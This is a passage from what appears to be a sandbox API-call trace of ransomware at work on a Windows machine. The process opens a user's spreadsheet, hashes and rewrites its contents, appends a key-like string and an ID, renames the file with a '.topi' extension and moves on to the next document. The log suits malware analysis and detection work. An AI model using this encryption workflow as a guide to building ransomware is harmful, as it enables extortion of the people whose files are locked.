lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0097.502] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0097.502] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.502] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.502] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\") returned="ZLuF9crj\\" [0097.502] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\") returned="D7sre-3HX8SgHUb\\" [0097.502] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\") returned="Gydf_ honDHk\\" [0097.502] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0097.502] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.503] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.503] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.503] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.503] PathFindFileNameW (pszPath="") returned="" [0097.504] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\IxLA-DmyLdjhBkL8Hl.xls") returned=".xls" [0097.505] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\IxLA-DmyLdjhBkL8Hl.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\zluf9crj\\ixla-dmyldjhbkl8hl.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.505] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=95468) returned 1 [0097.505] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.509] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x174c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.509] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.511] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df338) returned 1 [0097.513] CryptCreateHash (in: hProv=0x6df338, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.513] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.513] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.513] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.513] GetLastError () returned 0x0 [0097.514] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.514] CryptReleaseContext (hProv=0x6df338, dwFlags=0x0) returned 1 [0097.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.514] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.514] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.514] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.514] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.514] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.514] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.514] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x174f0) returned 0x9a06a00 [0097.515] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.515] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb5c0 [0097.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e38 [0097.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb608 [0097.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e50 [0097.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e80 [0097.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e98 [0097.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.515] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.515] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e80 | out: hHeap=0x680000) returned 1 [0097.515] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e98 | out: hHeap=0x680000) returned 1 [0097.515] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.515] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.515] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.515] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0097.516] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4e98 [0097.516] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.516] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4e80 [0097.516] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0097.516] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.516] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.516] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.516] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.516] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.516] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.516] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.516] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.516] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e98 | out: hHeap=0x680000) returned 1 [0097.516] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.516] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e80 | out: hHeap=0x680000) returned 1 [0097.516] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.516] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.517] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.517] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.517] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.517] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.517] GetCurrentThreadId () returned 0x8c4 [0097.517] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.517] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9b60 [0097.517] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.517] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df338 [0097.517] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.517] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.517] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.517] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.517] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.517] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.517] GetCurrentThreadId () returned 0x8c4 [0097.517] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.517] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.518] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0097.518] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.518] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.518] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.518] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.518] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0097.518] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.518] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.518] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.518] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.518] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.518] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.518] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.518] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.518] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.518] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e80 [0097.519] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.519] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e98 [0097.519] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.519] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.519] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e68 [0097.520] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.520] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.520] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.520] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.520] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.520] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.520] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.520] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4eb0 [0097.521] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.521] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0097.521] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.521] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.521] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.521] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.521] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.521] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.521] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e80 | out: hHeap=0x680000) returned 1 [0097.521] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4e80 [0097.521] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.521] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.521] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.521] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.521] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.521] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.521] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.521] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.521] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.521] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.521] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e80 | out: hHeap=0x680000) returned 1 [0097.521] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.521] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.522] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df338 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4eb0 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e98 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e68 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4e50 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb608 | out: hHeap=0x680000) returned 1 [0097.522] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.523] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.523] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.523] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.523] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.523] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.523] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.523] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.523] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.523] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.523] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.523] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x174e7, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x174e7, lpOverlapped=0x0) returned 1 [0097.524] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.524] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x174ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.524] WriteFile (in: hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.524] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.524] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.524] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.524] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.524] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.524] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.524] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.524] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.524] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.524] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.524] CloseHandle (hObject=0x6a8) returned 1 [0097.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd0) returned 0x3134738 [0097.537] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e0) returned 0x31cf750 [0097.537] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3134738 | out: hHeap=0x680000) returned 1 [0097.538] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\IxLA-DmyLdjhBkL8Hl.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\zluf9crj\\ixla-dmyldjhbkl8hl.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\ZLuF9crj\\IxLA-DmyLdjhBkL8Hl.xls.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\zluf9crj\\ixla-dmyldjhbkl8hl.xls.topi")) returned 1 [0097.538] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.538] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.539] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.540] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.540] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e5500c0, ftCreationTime.dwHighDateTime=0x1d5c4a0, ftLastAccessTime.dwLowDateTime=0x2ccd9910, ftLastAccessTime.dwHighDateTime=0x1d5bc1e, ftLastWriteTime.dwLowDateTime=0x2ccd9910, ftLastWriteTime.dwHighDateTime=0x1d5bc1e, nFileSizeHigh=0x0, nFileSizeLow=0x4e6b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J2iZYyqK4GgN.csv", cAlternateFileName="J2IZYY~1.CSV")) returned 1 [0097.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.540] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xee) returned 0x9a03438 [0097.540] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.540] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ 